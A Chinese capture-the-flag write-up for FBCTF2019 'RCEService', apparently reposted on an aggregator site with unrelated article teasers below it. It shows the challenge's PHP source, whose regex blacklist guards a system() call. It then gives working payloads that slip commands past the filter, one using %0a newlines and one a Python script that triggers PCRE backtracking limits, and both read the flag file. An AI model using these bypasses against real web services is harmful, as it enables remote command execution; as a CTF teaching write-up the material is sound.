[FBCTF2019]RCEService (PCRE回溯绕过和%a0换行绕过)

news2024/11/24 20:01:00

json格式输入ls出现index.php

这道题原本是给了源码的,BUUCTF没给

源码:

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];	//将cmd键的值给$cmd
    if ($cmd !== NULL) {
      system($cmd);	//绕过过滤执行命令
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}
?>

可用bash命令有: cat tac nl more wget grep tail flag less head sed cut awk strings od curl scp rm xxd mv cp pwd ls echo sed sort

可以发现过滤了相当多的字符,但是可以注意到正则匹配表达式采用了^xxx$的格式,同时也采用了.*这样的贪婪匹配,所以有两个方案来绕过正则——回溯次数超限和利用%0a。

其次需要注意putenv('PATH=/home/rceservice/jail');意味着我们无法直接去调用cat等命令,因为这些命令实际上是存放在特定目录中封装好的程序,PATH环境变量就是存放这些特定目录的路径方便我们去直接调用这些命令,所以此处部分命令我们得使用其存放的绝对路径去调用(不知道这些命令在哪可以用whereis命令在自己VPS上查找)。

%0a

preg_replace函数可以匹配并替换字符串中的指定模式,但默认只会替换第一个匹配到的部分

%0a对于^xxx$这个格式的绕过太常见了,只需要注意下表达式中存在一段

image-20220323113348315

会匹配一个%0a,但多在payload前后加几个%0a就行了。

构造payload:

?cmd={%0a"cmd":"ls%20/"%0a}

未发现flag,使用find找一下

构造payload:

?cmd={%0a"cmd":"/usr/bin/find / -name *flag*"%0a}

不能直接用的命令可以自己在虚拟机上whereis找一下路径,因为环境变量被改了

发现第一个也在源码设置的环境变量路径下,多半是这个了

构造最终payload:

?cmd={%0a"cmd":"/usr/bin/head /home/rceservice/flag"%0a}

拿到flag

第二种方法参考皮神文章

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌 (leavesongs.com)

直接上exp

import requests

url  = "http://0097b389-a7a5-4d40-b4d1-5ca389bc0b66.node5.buuoj.cn:81/"
payload = '{"cmd": "/bin/cat /home/rceservice/flag", "zz": "'+"a"*(1000000)+'"}'
res = requests.post(url, data={"cmd": payload}, timeout=10)
print(res.text)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1965762.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

WebLogic: CVE-2020-14882/14883【getshell】

记录第一次getshell公网设备 漏洞介绍 CVE-2020-14882&#xff1a;允许 未授权 的用户绕过管理控制台 &#xff08;Console&#xff09;的权限验证访问后台 CVE-2020-14883&#xff1a;允许后台任意用户通过HTTP协议 执行任意命令 使用这两个漏洞组成的利用链&#xff0c;可通过…

ECCV`24 | 比DragDiffusion快100倍!RegionDrag:快·准·好的图像编辑方法!港大牛津

文章链接&#xff1a;https://arxiv.org/pdf/2407.18247 github链接&#xff1a;https://github.com/LuJingyi-John/RegionDrag 亮点直击 引入了一种基于区域的图像编辑方法&#xff0c;以克服基于点拖拽方法的局限性&#xff0c;利用更丰富的输入上下文来更好地对齐编辑结果与…

排序算法:归并排序,golang实现

目录 前言 归并排序 代码示例 1. 算法包 2. 归并排序代码 3. 模拟程序 4. 运行程序 5. 从大到小排序 归并排序主要操作 1. 合并 2. 分割&#xff08;Divide&#xff09;与递归排序&#xff08;Conquer&#xff09; 总体思想 循环次数测试 假如 10 条数据进行排序…

虾皮笔试0620-编程题

难度偏易&#xff0c;给出解题思路。 按照空格分割字符串&#xff0c;每个字符串用双指针反转小写字母。 记录原来位置到二维数组&#xff0c;排序&#xff0c;从小到达购买&#xff0c;再把英雄对应之前的位置排序输出。 先变成循环链表&#xff0c;找到旋转后的头节点&#x…

day2 PS教程——搞定图层的使用方法,效率大翻倍

day2 PS教程——搞定图层的使用方法&#xff0c;效率大翻倍 目录 1.图层 智能对象 2.蒙版 与智能对象绑定 使用橡皮——镂空 剪切模板 上放图片&#xff0c;下放图形&#xff0c;按ALT同时&#xff0c;点击两图层间的即可 底下可以放黑色背景 选中多个图层后&#xff0…

海尔智家三翼鸟:从家电到场景,能否跨越智能化陷阱?

在智能家居浪潮的席卷之下&#xff0c;三翼鸟作为海尔智家旗下的场景品牌&#xff0c;曾一度被视为传统家电厂商转型升级的典范。然而&#xff0c;在光鲜亮丽的宣传背后&#xff0c;三翼鸟正逐步暴露出难以忽视的困境与挑战&#xff0c;其智能化之路似乎并不如预期般顺畅。 从用…

内存一直增加—-代码里有matplotlib绘图的代码

问题描述 最近在调试代码的时候发现内存一直在呈线性增加,持续一段时间后程序就会停止,但是排查了好久也没有发现问题. 最后发现竟然是绘图代码的问题,没有plt.close(),导致生成的绘图一直保存在内存里不断增加. 解决方案 增加一行代码plt.close(),把绘图关闭 点击访问博…

AcWing 1191. 家谱树(图论,拓扑排序的模板)

有个人的家族很大&#xff0c;辈分关系很混乱&#xff0c;请你帮整理一下这种关系。 给出每个人的孩子的信息。 输出一个序列&#xff0c;使得每个人的孩子都比那个人后列出。 输入格式 第 1 行一个整数 n&#xff0c;表示家族的人数&#xff1b; 接下来 n 行&#xff0c;…

app逆向实战:某新闻7.38.0版本加固脱壳和参数分析

本篇博客旨在记录学习过程&#xff0c;不可用于商用等其它途径 入口 这次研究的是头条数据接口&#xff0c;每次向下滑动即可刷新请求 抓包 根据抓包结果得知动态参数是st和sn&#xff0c;大胆猜测sn的生成跟st有关&#xff0c;其它参数是固定的&#xff0c;后面看生成具体…

windows如何让右键点击时不折叠选项(展开显示更多选项)?

升级windows后&#xff0c;发现右键菜单自动折叠了&#xff0c;用起来很不方便&#xff0c;有没有办法&#xff0c;让右键菜单自动展开那 &#xff1f; 期望的效果是这样的&#xff1a; 具体操作请参考我这篇公众号文章。 windows如何让右键点击时不折叠选项&#xff08;展开…

细说MCU构建两路包含ADC和DAC的测量系统的方法

目录 一、参考工程 二 、硬件配置 1.配置GPIO 2.配置ADC1和ADC2 3.配置DAC1和DAC2 4.配置定时器 5.配置串口 6.选择时钟源和Debug 7.配置系统时钟和ADC时钟 三、代码修改 1.定义DAC波形数据 2.重定义外部中断回调函数 3.重定义ADC回调函数 4.初始化 5.变…

校园气膜体育馆:快速搭建高端多功能运动场—轻空间

在现代校园建设中&#xff0c;体育设施的完善至关重要。气膜体育馆作为一种创新的解决方案&#xff0c;因其快速搭建、高端品质和多功能使用而受到广泛关注。它能够满足包括篮球和羽毛球在内的多种体育项目需求&#xff0c;为校园提供了一个理想的运动场地。 迅速搭建&#xff…

网工内推 | 上市公司网工,14薪,IP/软考认证优先,带薪年假

01 威派格 &#x1f537;招聘岗位&#xff1a;网络工程师 &#x1f537;岗位职责&#xff1a; 1.负责项目的网络规划、设计、实施&#xff1b;网络基础架构的持续优化。 2.负责网络设备和网络环境的日常维护&#xff0c;排错&#xff0c;分析故障原因&#xff0c;提供维护方…

【调试笔记-20240731-Linux-Wordpress 添加 wp-weixin 插件支持微信用户扫码注册登录】

调试笔记-系列文章目录 调试笔记-20240731-Linux-Wordpress 添加 wp-weixin 插件支持微信用户扫码注册登录 文章目录 调试笔记-系列文章目录调试笔记-20240731-Linux-Wordpress 添加 wp-weixin 插件支持微信用户扫码注册登录 前言一、调试环境操作系统&#xff1a;Windows 10 …

网页出现 404 这些代表什么你知道吗?带你了解网络请求状态码

每个状态码都代表不同的含义&#xff0c;下面我们就一起来看一看这些状态码都代表什么意思。 网络请求状态码 网络请求状态码是服务器在响应客户端请求时返回的三位数字代码。这些代码用于指示请求的结果&#xff0c;包括成功、重定向、客户端错误和服务器错误。那网络状态码…

Langchain入门教程

1、框架介绍 LangChain 是一个用于构建大语言模型应用的开源框架&#xff0c;2022年10月作为开源项目推出&#xff0c;目前已经在开发社区颇具名气&#xff0c;构建起了自己的一片开发生态。 LangChain 在 2023 年 3 月获得了 Benchmark Capital 的 1000 万美元种子轮融资&am…

用于实现无线数据传输和通信连接的2.4GHz无线芯片-RF298

2.4GHz无线射频收发芯片是一种常见的无线通信模块&#xff0c;它工作在2.4GHz频段&#xff0c;用于实现无线数据传输和通信连接&#xff1b;通常用于各种无线通信设备&#xff0c;如手机、Wi-Fi路由器、蓝牙设备、无线鼠标键盘、电视和机顶盒遥控器、智能家居及物联网系统、遥控…

数据结构_study(五)

树 n(n>0)个结点的有限集 空树&#xff1a;n0 在非空树中&#xff1a; 有且仅有一个特定的根root结点&#xff1b; n>1时&#xff0c;其余结点可以分为m个互不相交的有限集&#xff0c;其中每个集合也是一棵树&#xff0c;根的子树 一对多 结点的度&#xff1a;结点拥…

SpringBoot整合Flink CDC实时同步postgresql变更数据,基于WAL日志

SpringBoot整合Flink CDC实时同步postgresql变更数据&#xff0c;基于WAL日志 一、前言二、技术介绍&#xff08;Flink CDC&#xff09;1、Flink CDC2、Postgres CDC 三、准备工作四、代码示例五、总结 一、前言 在工作中经常会遇到要实时获取数据库&#xff08;postgresql、m…

“等保测评下的数据加密与隐私保护“

在当今数字化时代&#xff0c;数据已成为企业最宝贵的资产之一。然而&#xff0c;数据泄露、隐私侵犯等事件频发&#xff0c;不仅给企业带来经济损失&#xff0c;更严重损害了公众信任。等保测评&#xff0c;作为国家信息安全等级保护制度的重要组成部分&#xff0c;对数据加密…